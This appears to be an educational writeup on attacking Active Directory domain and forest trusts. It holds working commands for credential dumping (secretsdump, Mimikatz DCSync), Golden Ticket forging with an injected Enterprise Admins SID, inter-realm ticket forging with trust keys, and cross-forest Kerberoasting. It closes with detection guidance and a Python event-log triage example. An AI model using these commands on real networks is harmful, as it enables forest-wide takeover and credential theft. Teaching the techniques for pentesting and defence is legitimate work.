Domain Trust Attacks

Advanced | 40 min | Writeup

Attacking trust relationships between domains

Learning Objectives

  • Enumerate trust relationships
  • Exploit trust misconfigurations
  • Move across domain boundaries
  • Compromise forest trusts

Active Directory Trust relationships allow users in one domain to access resources in another. They're essential for large organizations - but they're also pathways for attackers. Compromise one domain, and trusts can lead you to others.

Think of trusts like border agreements between countries. A trust says "citizens from Domain A can visit Domain B." But if you forge citizenship documents (like Golden Tickets with extra SIDs), you can claim to be anyone.

Trust = Access Expansion

Every trust relationship is a potential lateral movement path. In pentests, enumerating and exploiting trusts often leads from a child domain all the way to the forest root.

Types of Trusts

Trust Types:
├── Parent-Child Trust
│   ├── Automatic between parent/child domains
│   ├── Bidirectional and transitive
│   └── child.corp.local ↔ corp.local
├── Tree-Root Trust
│   ├── Between forest root and new tree roots
│   ├── Bidirectional and transitive
│   └── corp.local ↔ subsidiary.local (same forest)
├── Forest Trust
│   ├── Between different forests
│   ├── Typically bidirectional, can be one-way
│   └── corp.local ↔ partner.local (different forests)
├── External Trust
│   ├── Between domains in different forests
│   ├── Non-transitive
│   └── Legacy, less common
├── Shortcut Trust
│   ├── Optimization between distant domains
│   └── Reduces authentication hops
└── Realm Trust
    └── Between AD and non-Windows Kerberos (MIT)

Trust Properties:
├── Direction: One-way or bidirectional
├── Transitivity: Trust extends through chain or not
└── SID Filtering: Enabled (secure) or disabled (exploitable)

Enumerating Trusts

powershell
# PowerView
Get-DomainTrust
Get-DomainTrust -Domain corp.local
Get-ForestTrust

# Output includes:
# SourceName : child.corp.local
# TargetName : corp.local
# TrustType : ParentChild
# TrustAttributes : WITHIN_FOREST
# TrustDirection : Bidirectional
# WhenChanged : 1/1/2024

# AD Module
Get-ADTrust -Filter *
Get-ADTrust -Identity "corp.local"

# nltest (built-in)
nltest /domain_trusts
nltest /trusted_domains

# Mapping the forest
Get-ForestDomain   # All domains in current forest

bash
# Linux enumeration
# ldapsearch (trustedDomain objects live under CN=System)
ldapsearch -x -H ldap://dc.corp.local -D "user@corp.local" -w password \
    -b "CN=System,DC=corp,DC=local" "(objectClass=trustedDomain)"

# BloodHound shows trust relationships
# Look for cross-domain edges

Child to Parent Domain Escalation

Child-Parent Trust Attack:
├── You: Domain Admin in child.corp.local
├── Target: Enterprise Admin in corp.local (forest root)
└── Method: Forge Golden Ticket with Enterprise Admin SID

Why it works:
├── Parent-child trusts disable SID filtering
├── Child DA can create tickets with any SID
├── Enterprise Admins SID = S-1-5-21-<ForestRootDomainSID>-519
└── Add EA SID to Golden Ticket = instant forest compromise

Attack Steps

bash
# Step 1: Get child domain KRBTGT hash (you're DA)
secretsdump.py child.corp.local/Administrator:password@childdc.child.corp.local -just-dc-user krbtgt

# Step 2: Get forest root domain SID
# Method 1: Query root domain
lookupsid.py corp.local/user:password@dc.corp.local

# Method 2: From trust object
Get-DomainTrust -Domain child.corp.local | Select-Object TargetName, TargetDomainSid

# Enterprise Admins SID = Root Domain SID + 519
# e.g., S-1-5-21-1234567890-1234567890-1234567890-519

# Step 3: Forge Golden Ticket with EA SID
ticketer.py -nthash CHILD_KRBTGT_HASH \
    -domain-sid S-1-5-21-CHILD-DOMAIN-SID \
    -domain child.corp.local \
    -extra-sid S-1-5-21-ROOT-DOMAIN-SID-519 \
    Administrator

# Step 4: Use ticket to access forest root DC
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass child.corp.local/Administrator@dc.corp.local

# You're now Enterprise Admin!

Forest Root = Game Over

Enterprise Admins have admin rights across the ENTIRE forest. From one child domain compromise, you can escalate to control every domain in the forest.

SID Filtering & SID History

SID Filtering:
├── Security mechanism on trust boundary
├── Filters out SIDs not from trusted domain
├── Prevents cross-domain privilege escalation
├── ENABLED by default on external/forest trusts
└── DISABLED by default on intra-forest trusts

SID History:
├── Attribute storing previous SIDs
├── Used during domain migrations
├── Honored across trusts (if SID filtering off)
└── Can be abused to inject privileged SIDs

If SID Filtering DISABLED:
├── Golden Ticket with extra SIDs works
├── SID History abuse works
└── Full cross-trust privilege escalation

If SID Filtering ENABLED:
├── Extra SIDs stripped at trust boundary
├── Can't inject Enterprise Admin SID
└── But other attacks may still work

Checking SID Filtering Status

powershell
# Check trust attributes
Get-DomainTrust | Select-Object TargetName, TrustAttributes

# TrustAttributes values:
# WITHIN_FOREST (0x20) - Intra-forest, no SID filtering
# FOREST_TRANSITIVE (0x08) - Forest trust
# QUARANTINED_DOMAIN (0x04) - SID filtering enforced

# netdom (no value after /quarantine shows the current setting)
netdom trust child.corp.local /domain:corp.local /quarantine

Cross-Forest Attacks

Forest trusts typically have SID filtering ENABLED.
Different attack approaches needed:

Option 1: Find users with cross-forest access
├── Enumerate foreign group memberships
├── User in Forest A might be in groups in Forest B
└── Compromise that user = access to Forest B

Option 2: Kerberoast across trust
├── Request TGS for SPNs in trusted forest
├── Crack hashes offline
└── Use cracked credentials

Option 3: Exploit shared service accounts
├── Same service account in multiple forests
└── Credentials from one work in other

Option 4: Find trust keys
├── Trust keys are like machine account passwords
├── Enable ticket forging across trust
└── Requires high privilege in one forest

powershell
# Find users in trusted forest groups
Get-DomainForeignGroupMember -Domain partner.local

# Find SPNs in trusted forest
Get-DomainUser -SPN -Domain partner.local

# Kerberoast across trust
Rubeus.exe kerberoast /domain:partner.local

# certipy/GetUserSPNs.py also work cross-trust

Trust Key Attacks

Trust Key (Trust Password):
├── Shared secret between trusted domains
├── Used to encrypt inter-realm TGTs
├── Stored as machine account-like object
└── Can be extracted with DCSync

If you have trust key:
├── Create inter-realm TGT
├── Present to trusted domain's KDC
├── Get TGT in trusted domain
└── Now operate in trusted domain

bash
# Extract trust key (requires DA in one domain)
secretsdump.py corp.local/Administrator:password@dc.corp.local

# Look for: child.corp.local$:...:HASH

# Or Mimikatz
lsadump::dcsync /user:child.corp.local$ /domain:corp.local

# Create inter-realm TGT
ticketer.py -nthash TRUST_KEY \
    -domain-sid S-1-5-21-CHILD-SID \
    -domain child.corp.local \
    -spn krbtgt/CORP.LOCAL \
    Administrator

# Use to get TGT in parent domain

Exploiting Foreign Principals

powershell
# Find foreign principals in local groups
Get-DomainForeignGroupMember

# Output:
# GroupDomain : corp.local
# GroupName : Domain Admins
# MemberDomain : partner.local
# MemberName : admin_partner

# This means admin_partner from partner.local
# is Domain Admin in corp.local!

# If you compromise admin_partner in partner.local
# You're DA in corp.local via trust

# Find in BloodHound (Cypher query)
MATCH p=(n)-[:MemberOf*1..]->(g:Group)
WHERE n.domain <> g.domain
RETURN p

Detection & Defense

Detection:
├── Event ID 4769 - Cross-domain TGS request
├── Event ID 4768 - Inter-realm TGT usage
├── Tickets with SID History/extra SIDs
│   └── Unusual for normal operations
├── Trust modifications
│   └── Event ID 4706, 4707, 4716
└── BloodHound paths crossing trust boundaries

Defense:
├── Enable SID Filtering on all trusts
│   └── netdom trust <trusting-domain> /domain:<trusted-domain> /quarantine:yes
├── Use Selective Authentication
│   └── Explicit access grants only
├── Minimize cross-forest group memberships
├── Monitor for inter-realm ticket activity
├── Regular trust relationship audits
├── Protected Users group (no delegation across trusts)
└── Minimize number of trusts
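As an added example (not part of the original writeup), a small Python triage routine that applies the detection points above to Windows Security event records: a 4769 on a DC whose requesting account belongs to another realm is flagged as a cross-domain TGS request, and 4706/4707/4716 are flagged as trust modifications. The records are constructed and the field names are assumed to match the EventData names of those events.

```python
# Added example, not from the original writeup: triage Windows Security
# events for the trust-related signals listed above.  Records are
# constructed dicts keyed by the EventData field names (assumed to match
# the XML of 4769 / 4706 / 4707 / 4716); nothing here is real log data.
TRUST_CHANGE_EVENTS = {
    4706: "new trust created",
    4707: "trust removed",
    4716: "trusted domain information modified",
}


def realm_of(event):
    """Realm of the requesting account, from 'user@REALM' or TargetDomainName."""
    user = event.get("TargetUserName", "")
    if "@" in user:
        return user.rsplit("@", 1)[1].upper()
    return event.get("TargetDomainName", "").upper()


def trust_alerts(events, local_domain):
    """Return (EventID, reason, detail) tuples worth an analyst's attention."""
    local = local_domain.upper()
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4769 and realm_of(ev) != local:
            # TGS request served by this DC for an account from another
            # realm: the request crossed a trust boundary.
            alerts.append((eid, "cross-domain TGS request",
                           f"{ev['TargetUserName']} -> {ev['ServiceName']}"))
        elif eid in TRUST_CHANGE_EVENTS:
            alerts.append((eid, TRUST_CHANGE_EVENTS[eid], ev.get("DomainName", "?")))
    return alerts


# Constructed sample events as they might be logged on dc.corp.local.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL",
     "TargetDomainName": "CORP.LOCAL", "ServiceName": "cifs/fs01.corp.local"},
    {"EventID": 4769, "TargetUserName": "Administrator@CHILD.CORP.LOCAL",
     "TargetDomainName": "CHILD.CORP.LOCAL", "ServiceName": "DC$"},
    {"EventID": 4716, "DomainName": "partner.local"},
]

if __name__ == "__main__":
    for alert in trust_alerts(SAMPLE_EVENTS, "corp.local"):
        print(alert)
```

A cross-domain 4769 is normal for users who legitimately work across the trust, so the value of this rule is in baselining which accounts and services appear and alerting on new pairs, especially privileged ones.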

Selective Authentication

Instead of trusting all users from a domain, Selective Authentication requires explicit permission for each resource. More restrictive but more secure.

Trust Attack Methodology

Trust Exploitation Flow

1. Map Trusts: Enumerate all trust relationships
2. Check Filtering: Determine if SID filtering is enabled
3. Find Paths: Look for cross-trust group memberships
4. Get Keys: DCSync trust keys if possible
5. Forge Tickets: Create tickets with extra SIDs
6. Escalate: Use access to compromise more domains

Knowledge Check


What allows child-to-parent domain escalation?

Challenges

Forest Root Compromise

Challenge (advanced)

From Domain Admin in a child domain, forge a Golden Ticket with Enterprise Admins SID to compromise the forest root.


Key Takeaways

  • Parent-child trusts lack SID filtering = easy escalation
  • Enterprise Admins SID (519) grants forest-wide access
  • SID filtering blocks extra-SID attacks on forest trusts
  • Foreign group memberships create cross-trust paths
  • Trust keys enable inter-realm ticket forging
  • Always enumerate trusts - they expand your attack surface